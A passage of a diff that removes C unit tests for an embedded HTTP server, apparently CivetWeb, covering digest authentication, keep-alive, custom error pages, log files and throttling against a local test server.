-	send_chunk_string(client_conn, "\r\n");
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"break_field_handler\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "abort\r\n");
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"dontread\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "xyz\r\n");
-	send_chunk_string(client_conn, "--multipart-form-data-boundary");
-	send_chunk_string(client_conn, "--see-RFC-2388--\r\n");
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Close the server */
-	g_ctx = NULL;
-	test_mg_stop(ctx);
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_http_auth)
-{
-#if !defined(NO_FILES)
-	const char *OPTIONS[] = {
-		"document_root",
-		".",
-		"listening_ports",
-		"8080",
-#if !defined(NO_CACHING)
-		"static_file_max_age",
-		"0",
-#endif
-		"put_delete_auth_file",
-		"put_delete_auth_file.csv",
-		NULL,
-	};
-
-	struct mg_context *ctx;
-	struct mg_connection *client_conn;
-	char client_err[256], nonce[256];
-	const struct mg_request_info *client_ri;
-	int client_res;
-	FILE *f;
-	const char *passwd_file = ".htpasswd";
-	const char *test_file = "test_http_auth.test_file.txt";
-	const char *test_content = "test_http_auth test_file content";
-	const char *domain;
-	const char *doc_root;
-	const char *auth_request;
-	const char *str;
-	size_t len;
-	int i;
-	char HA1[256], HA2[256], HA[256];
-	char HA1_md5_buf[33], HA2_md5_buf[33], HA_md5_buf[33];
-	char *HA1_md5_ret, *HA2_md5_ret, *HA_md5_ret;
-	const char *nc = "00000001";
-	const char *cnonce = "6789ABCD";
-
-	mark_point();
-
-	/* Start with default options */
-	ctx = test_mg_start(NULL, NULL, OPTIONS);
-
-	ck_assert(ctx != NULL);
-	domain = mg_get_option(ctx, "authentication_domain");
-	ck_assert(domain != NULL);
-	len = strlen(domain);
-	ck_assert_uint_gt(len, 0);
-	ck_assert_uint_lt(len, 64);
-	doc_root = mg_get_option(ctx, "document_root");
-	ck_assert_str_eq(doc_root, ".");
-
-	/* Create a default file in the document root */
-	f = fopen(test_file, "w");
-	if (f) {
-		fprintf(f, "%s", test_content);
-		fclose(f);
-	} else {
-		ck_abort_msg("Cannot create file %s", test_file);
-	}
-
-	(void)remove(passwd_file);
-	(void)remove("put_delete_auth_file.csv");
-
-	client_res = mg_modify_passwords_file("put_delete_auth_file.csv",
-	                                      domain,
-	                                      "admin",
-	                                      "adminpass");
-	ck_assert_int_eq(client_res, 1);
-
-	/* Read file before a .htpasswd file has been created */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n\r\n", test_file);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-	ck_assert_str_eq(client_err, test_content);
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* Create a .htpasswd file */
-	client_res = mg_modify_passwords_file(passwd_file, domain, "user", "pass");
-	ck_assert_int_eq(client_res, 1);
-
-	client_res = mg_modify_passwords_file(NULL, domain, "user", "pass");
-	ck_assert_int_eq(client_res, 0); /* Filename is required */
-
-	test_sleep(1);
-
-	/* Repeat test after .htpasswd is created */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n\r\n", test_file);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "401");
-
-	auth_request = NULL;
-	for (i = 0; i < client_ri->num_headers; i++) {
-		if (!mg_strcasecmp(client_ri->http_headers[i].name,
-		                   "WWW-Authenticate")) {
-			ck_assert_ptr_eq(auth_request, NULL);
-			auth_request = client_ri->http_headers[i].value;
-			ck_assert_ptr_ne(auth_request, NULL);
-		}
-	}
-	ck_assert_ptr_ne(auth_request, NULL);
-	str = "Digest qop=\"auth\", realm=\"";
-	len = strlen(str);
-	ck_assert(!mg_strncasecmp(auth_request, str, len));
-	ck_assert(!strncmp(auth_request + len, domain, strlen(domain)));
-	len += strlen(domain);
-	str = "\", nonce=\"";
-	ck_assert(!strncmp(auth_request + len, str, strlen(str)));
-	len += strlen(str);
-	str = strchr(auth_request + len, '\"');
-	ck_assert_ptr_ne(str, NULL);
-	ck_assert_ptr_ne(str, auth_request + len);
-	/* nonce is from including (auth_request + len) to excluding (str) */
-	ck_assert_int_gt((ptrdiff_t)(str) - (ptrdiff_t)(auth_request + len), 0);
-	ck_assert_int_lt((ptrdiff_t)(str) - (ptrdiff_t)(auth_request + len),
-	                 (ptrdiff_t)sizeof(nonce));
-	memset(nonce, 0, sizeof(nonce));
-	memcpy(nonce,
-	       auth_request + len,
-	       (size_t)((ptrdiff_t)(str) - (ptrdiff_t)(auth_request + len)));
-	memset(HA1, 0, sizeof(HA1));
-	memset(HA2, 0, sizeof(HA2));
-	memset(HA, 0, sizeof(HA));
-	memset(HA1_md5_buf, 0, sizeof(HA1_md5_buf));
-	memset(HA2_md5_buf, 0, sizeof(HA2_md5_buf));
-	memset(HA_md5_buf, 0, sizeof(HA_md5_buf));
-
-	sprintf(HA1, "%s:%s:%s", "user", domain, "pass");
-	sprintf(HA2, "%s:/%s", "GET", test_file);
-	HA1_md5_ret = mg_md5(HA1_md5_buf, HA1, NULL);
-	HA2_md5_ret = mg_md5(HA2_md5_buf, HA2, NULL);
-
-	ck_assert_ptr_eq(HA1_md5_ret, HA1_md5_buf);
-	ck_assert_ptr_eq(HA2_md5_ret, HA2_md5_buf);
-
-	HA_md5_ret = mg_md5(HA_md5_buf, "user", ":", domain, ":", "pass", NULL);
-	ck_assert_ptr_eq(HA_md5_ret, HA_md5_buf);
-	ck_assert_str_eq(HA1_md5_ret, HA_md5_buf);
-
-	HA_md5_ret = mg_md5(HA_md5_buf, "GET", ":", "/", test_file, NULL);
-	ck_assert_ptr_eq(HA_md5_ret, HA_md5_buf);
-	ck_assert_str_eq(HA2_md5_ret, HA_md5_buf);
-
-	HA_md5_ret = mg_md5(HA_md5_buf,
-	                    HA1_md5_buf,
-	                    ":",
-	                    nonce,
-	                    ":",
-	                    nc,
-	                    ":",
-	                    cnonce,
-	                    ":",
-	                    "auth",
-	                    ":",
-	                    HA2_md5_buf,
-	                    NULL);
-	ck_assert_ptr_eq(HA_md5_ret, HA_md5_buf);
-
-	mg_close_connection(client_conn);
-
-	/* Retry with authorization */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n", test_file);
-	mg_printf(client_conn,
-	          "Authorization: Digest "
-	          "username=\"%s\", "
-	          "realm=\"%s\", "
-	          "nonce=\"%s\", "
-	          "uri=\"/%s\", "
-	          "qop=auth, "
-	          "nc=%s, "
-	          "cnonce=\"%s\", "
-	          "response=\"%s\"\r\n\r\n",
-	          "user",
-	          domain,
-	          nonce,
-	          test_file,
-	          nc,
-	          cnonce,
-	          HA_md5_buf);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-	ck_assert_str_eq(client_err, test_content);
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* Retry DELETE with authorization of a user not authorized for DELETE */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "DELETE /%s HTTP/1.0\r\n", test_file);
-	mg_printf(client_conn,
-	          "Authorization: Digest "
-	          "username=\"%s\", "
-	          "realm=\"%s\", "
-	          "nonce=\"%s\", "
-	          "uri=\"/%s\", "
-	          "qop=auth, "
-	          "nc=%s, "
-	          "cnonce=\"%s\", "
-	          "response=\"%s\"\r\n\r\n",
-	          "user",
-	          domain,
-	          nonce,
-	          test_file,
-	          nc,
-	          cnonce,
-	          HA_md5_buf);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "401");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* Remove the user from the .htpasswd file again */
-	client_res = mg_modify_passwords_file(passwd_file, domain, "user", NULL);
-	ck_assert_int_eq(client_res, 1);
-
-	test_sleep(1);
-
-
-	/* Try to access the file again. Expected: 401 error */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n\r\n", test_file);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "401");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-
-	/* Now remove the password file */
-	(void)remove(passwd_file);
-	test_sleep(1);
-
-
-	/* Access to the file must work like before */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n\r\n", test_file);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-	ck_assert_str_eq(client_err, test_content);
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-
-	/* Stop the server and clean up */
-	test_mg_stop(ctx);
-	(void)remove(test_file);
-	(void)remove(passwd_file);
-	(void)remove("put_delete_auth_file.csv");
-
-#endif
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_keep_alive)
-{
-	struct mg_context *ctx;
-	const char *OPTIONS[] =
-	{ "listening_ports",
-	  "8081",
-	  "request_timeout_ms",
-	  "10000",
-	  "enable_keep_alive",
-	  "yes",
-#if !defined(NO_FILES)
-	  "document_root",
-	  ".",
-	  "enable_directory_listing",
-	  "no",
-#endif
-	  NULL };
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res, i;
-	const char *connection_header;
-
-	mark_point();
-
-	ctx = test_mg_start(NULL, NULL, OPTIONS);
-
-	ck_assert(ctx != NULL);
-
-	/* HTTP 1.1 GET request */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8081, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn,
-	          "GET / HTTP/1.1\r\nHost: "
-	          "localhost:8081\r\nConnection: keep-alive\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "403");
-#endif
-
-	connection_header = 0;
-	for (i = 0; i < client_ri->num_headers; i++) {
-		if (!mg_strcasecmp(client_ri->http_headers[i].name, "Connection")) {
-			ck_assert_ptr_eq(connection_header, NULL);
-			connection_header = client_ri->http_headers[i].value;
-			ck_assert_ptr_ne(connection_header, NULL);
-		}
-	}
-	/* Error replies will close the connection, even if keep-alive is set. */
-	ck_assert_ptr_ne(connection_header, NULL);
-	ck_assert_str_eq(connection_header, "close");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* TODO: request a file and keep alive
-	 * (will only work if NO_FILES is not set). */
-
-	/* Stop the server and clean up */
-	test_mg_stop(ctx);
-
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_error_handling)
-{
-	struct mg_context *ctx;
-	FILE *f;
-
-	char bad_thread_num[32] = "badnumber";
-
-	struct mg_callbacks callbacks;
-	char errmsg[256];
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res, i;
-
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-
-	mark_point();
-
-#if !defined(NO_FILES)
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#endif
-	OPTIONS[opt_cnt++] = "error_pages";
-	OPTIONS[opt_cnt++] = "./";
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-	OPTIONS[opt_cnt++] = "num_threads";
-	OPTIONS[opt_cnt++] = bad_thread_num;
-	OPTIONS[opt_cnt++] = "unknown_option";
-	OPTIONS[opt_cnt++] = "unknown_option_value";
-	OPTIONS[opt_cnt] = NULL;
-
-	memset(&callbacks, 0, sizeof(callbacks));
-
-	callbacks.log_message = log_msg_func;
-
-	/* test with unknown option */
-	memset(errmsg, 0, sizeof(errmsg));
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	/* Details of errmsg may vary, but it may not be empty */
-	ck_assert_str_ne(errmsg, "");
-	ck_assert(ctx == NULL);
-	ck_assert_str_eq(errmsg, "Invalid option: unknown_option");
-
-	/* Remove invalid option */
-	for (i = 0; OPTIONS[i]; i++) {
-		if (strstr(OPTIONS[i], "unknown_option")) {
-			OPTIONS[i] = 0;
-		}
-	}
-
-	/* Test with bad num_thread option */
-	memset(errmsg, 0, sizeof(errmsg));
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	/* Details of errmsg may vary, but it may not be empty */
-	ck_assert_str_ne(errmsg, "");
-	ck_assert(ctx == NULL);
-	ck_assert_str_eq(errmsg, "Invalid number of worker threads");
-
-/* Set to a number - but use a number above the limit */
-#ifdef MAX_WORKER_THREADS
-	sprintf(bad_thread_num, "%u", MAX_WORKER_THREADS + 1);
-#else
-	sprintf(bad_thread_num, "%lu", 1000000000lu);
-#endif
-
-	/* Test with bad num_thread option */
-	memset(errmsg, 0, sizeof(errmsg));
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	/* Details of errmsg may vary, but it may not be empty */
-	ck_assert_str_ne(errmsg, "");
-	ck_assert(ctx == NULL);
-	ck_assert_str_eq(errmsg, "Too many worker threads");
-
-
-	/* HTTP 1.0 GET request - server is not running */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-	ck_assert(client_conn == NULL);
-
-	/* Error message detail may vary - it may not be empty ans should contain
-	 * some information "connect" failed */
-	ck_assert_str_ne(client_err, "");
-	ck_assert(strstr(client_err, "connect"));
-
-
-	/* This time start the server with a valid configuration */
-	sprintf(bad_thread_num, "%i", 1);
-	memset(errmsg, 0, sizeof(errmsg));
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-
-	/* Server is running now */
-	test_sleep(1);
-
-	/* Remove error files (in case they exist) */
-	(void)remove("error.htm");
-	(void)remove("error4xx.htm");
-	(void)remove("error404.htm");
-
-
-	/* Ask for something not existing - should get default 404 */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /something/not/existing HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "404");
-	mg_close_connection(client_conn);
-	test_sleep(1);
-
-	/* Create an error.htm file */
-	f = fopen("error.htm", "wt");
-	ck_assert(f != NULL);
-	(void)fprintf(f, "err-all");
-	(void)fclose(f);
-
-
-	/* Ask for something not existing - should get error.htm */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /something/not/existing HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	mg_close_connection(client_conn);
-	ck_assert_int_eq(client_res, 7);
-	client_err[8] = 0;
-	ck_assert_str_eq(client_err, "err-all");
-	test_sleep(1);
-
-	/* Create an error4xx.htm file */
-	f = fopen("error4xx.htm", "wt");
-	ck_assert(f != NULL);
-	(void)fprintf(f, "err-4xx");
-	(void)fclose(f);
-
-
-	/* Ask for something not existing - should get error4xx.htm */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /something/not/existing HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	mg_close_connection(client_conn);
-	ck_assert_int_eq(client_res, 7);
-	client_err[8] = 0;
-	ck_assert_str_eq(client_err, "err-4xx");
-	test_sleep(1);
-
-	/* Create an error404.htm file */
-	f = fopen("error404.htm", "wt");
-	ck_assert(f != NULL);
-	(void)fprintf(f, "err-404");
-	(void)fclose(f);
-
-
-	/* Ask for something not existing - should get error404.htm */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /something/not/existing HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	mg_close_connection(client_conn);
-	ck_assert_int_eq(client_res, 7);
-	client_err[8] = 0;
-	ck_assert_str_eq(client_err, "err-404");
-	test_sleep(1);
-
-
-	/* Ask in a malformed way - should get error4xx.htm */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "Gimme some file!\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	mg_close_connection(client_conn);
-	ck_assert_int_eq(client_res, 7);
-	client_err[8] = 0;
-	ck_assert_str_eq(client_err, "err-4xx");
-	test_sleep(1);
-
-
-	/* Remove all error files created by this test */
-	(void)remove("error.htm");
-	(void)remove("error4xx.htm");
-	(void)remove("error404.htm");
-
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-
-	/* HTTP 1.1 GET request - must not work, since server is already stopped  */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert(client_conn == NULL);
-	ck_assert_str_ne(client_err, "");
-
-	test_sleep(1);
-
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_error_log_file)
-{
-	/* Server var */
-	struct mg_context *ctx;
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-
-	/* File content check var */
-	FILE *f;
-	char buf[1024];
-	int len, ok;
-
-	mark_point();
-
-	/* Set options and start server */
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-	OPTIONS[opt_cnt++] = "error_log_file";
-	OPTIONS[opt_cnt++] = "error.log";
-	OPTIONS[opt_cnt++] = "access_log_file";
-	OPTIONS[opt_cnt++] = "access.log";
-#if !defined(NO_FILES)
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#endif
-	OPTIONS[opt_cnt] = NULL;
-
-	ctx = test_mg_start(NULL, 0, OPTIONS);
-	ck_assert(ctx != NULL);
-
-	/* Remove log files (they may exist from previous incomplete runs of
-	 * this test) */
-	(void)remove("error.log");
-	(void)remove("access.log");
-
-	/* connect client */
-	memset(client_err_buf, 0, sizeof(client_err_buf));
-	memset(client_data_buf, 0, sizeof(client_data_buf));
-
-	client = mg_download("127.0.0.1",
-	                     8080,
-	                     0,
-	                     client_err_buf,
-	                     sizeof(client_err_buf),
-	                     "GET /not_existing_file.ext HTTP/1.0\r\n\r\n");
-
-	ck_assert(ctx != NULL);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-
-	ck_assert(client_ri != NULL);
-	ck_assert_str_eq(client_ri->local_uri, "404");
-
-	/* Close the client connection */
-	mg_close_connection(client);
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-
-	/* Check access.log */
-	memset(buf, 0, sizeof(buf));
-	f = fopen("access.log", "r");
-	ck_assert_msg(f != NULL, "Cannot open access log file");
-	ok = (NULL != fgets(buf, sizeof(buf) - 1, f));
-	(void)fclose(f);
-	ck_assert_msg(ok, "Cannot read access log file");
-	len = (int)strlen(buf);
-	ck_assert_int_gt(len, 0);
-	ok = (NULL != strstr(buf, "not_existing_file.ext"));
-	ck_assert_msg(ok, "Did not find uri in access log file");
-	ok = (NULL != strstr(buf, "404"));
-	ck_assert_msg(ok, "Did not find HTTP status code in access log file");
-
-	/* Check error.log */
-	memset(buf, 0, sizeof(buf));
-	f = fopen("error.log", "r");
-	if (f) {
-		(void)fgets(buf, sizeof(buf) - 1, f);
-		fclose(f);
-	}
-	ck_assert_msg(f == NULL,
-	              "Should not create error log file on 404, but got [%s]",
-	              buf);
-
-	/* Remove log files */
-	(void)remove("error.log");
-	(void)remove("access.log");
-
-	/* Start server with bad options */
-	ck_assert_str_eq(OPTIONS[0], "listening_ports");
-	OPTIONS[1] = "bad port syntax";
-
-	ctx = test_mg_start(NULL, 0, OPTIONS);
-	ck_assert_msg(
-	    ctx == NULL,
-	    "Should not be able to start server with bad port configuration");
-
-	/* Check access.log */
-	memset(buf, 0, sizeof(buf));
-	f = fopen("access.log", "r");
-	if (f) {
-		(void)fgets(buf, sizeof(buf) - 1, f);
-		fclose(f);
-	}
-	ck_assert_msg(
-	    f == NULL,
-	    "Should not create access log file if start fails, but got [%s]",
-	    buf);
-
-	/* Check error.log */
-	memset(buf, 0, sizeof(buf));
-	f = fopen("error.log", "r");
-	ck_assert_msg(f != NULL, "Cannot open access log file");
-	ok = (NULL != fgets(buf, sizeof(buf) - 1, f));
-	(void)fclose(f);
-	ck_assert_msg(ok, "Cannot read access log file");
-	len = (int)strlen(buf);
-	ck_assert_int_gt(len, 0);
-	ok = (NULL != strstr(buf, "port"));
-	ck_assert_msg(ok, "Did not find port as error reason in error log file");
-
-
-	/* Remove log files */
-	(void)remove("error.log");
-	(void)remove("access.log");
-
-	mark_point();
-}
-END_TEST
-
-
-static int
-test_throttle_begin_request(struct mg_connection *conn)
-{
-	const struct mg_request_info *ri;
-	long unsigned len = 1024 * 10;
-	const char *block = "0123456789";
-	unsigned long i, blocklen;
-
-	ck_assert(conn != NULL);
-	ri = mg_get_request_info(conn);
-	ck_assert(ri != NULL);
-
-	ck_assert_str_eq(ri->request_method, "GET");
-	ck_assert_str_eq(ri->request_uri, "/throttle");
-	ck_assert_str_eq(ri->local_uri, "/throttle");
-	ck_assert_str_eq(ri->http_version, "1.0");
-	ck_assert_str_eq(ri->query_string, "q");
-	ck_assert_str_eq(ri->remote_addr, "127.0.0.1");
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Length: %lu\r\n"
-	          "Connection: close\r\n\r\n",
-	          len);
-
-	blocklen = (unsigned long)strlen(block);
-
-	for (i = 0; i < len; i += blocklen) {
-		mg_write(conn, block, blocklen);
-	}
-
-	mark_point();
-
-	return 987; /* Not a valid HTTP response code,
-	             * but it should be written to the log and passed to
-	             * end_request. */
-}
-
-
-static void
-test_throttle_end_request(const struct mg_connection *conn,
-                          int reply_status_code)
-{
-	const struct mg_request_info *ri;
-
-	ck_assert(conn != NULL);
-	ri = mg_get_request_info(conn);
-	ck_assert(ri != NULL);
-
-	ck_assert_str_eq(ri->request_method, "GET");
-	ck_assert_str_eq(ri->request_uri, "/throttle");
-	ck_assert_str_eq(ri->local_uri, "/throttle");
-	ck_assert_str_eq(ri->http_version, "1.0");
-	ck_assert_str_eq(ri->query_string, "q");
-	ck_assert_str_eq(ri->remote_addr, "127.0.0.1");
-
-	ck_assert_int_eq(reply_status_code, 987);
-}
-
-
-START_TEST(test_throttle)
-{
-	/* Server var */
-	struct mg_context *ctx;
-	struct mg_callbacks callbacks;
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-
-	/* timing test */
-	int r, data_read;
-	time_t t0, t1;
-	double dt;
-
-	mark_point();
-
-
-/* Set options and start server */
-#if !defined(NO_FILES)
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#endif
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-	OPTIONS[opt_cnt++] = "throttle";
-	OPTIONS[opt_cnt++] = "*=1k";
-	OPTIONS[opt_cnt] = NULL;
-
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.begin_request = test_throttle_begin_request;
-	callbacks.end_request = test_throttle_end_request;
-
-	ctx = test_mg_start(&callbacks, 0, OPTIONS);
-	ck_assert(ctx != NULL);
-
-	/* connect client */
-	memset(client_err_buf, 0, sizeof(client_err_buf));
-	memset(client_data_buf, 0, sizeof(client_data_buf));
-
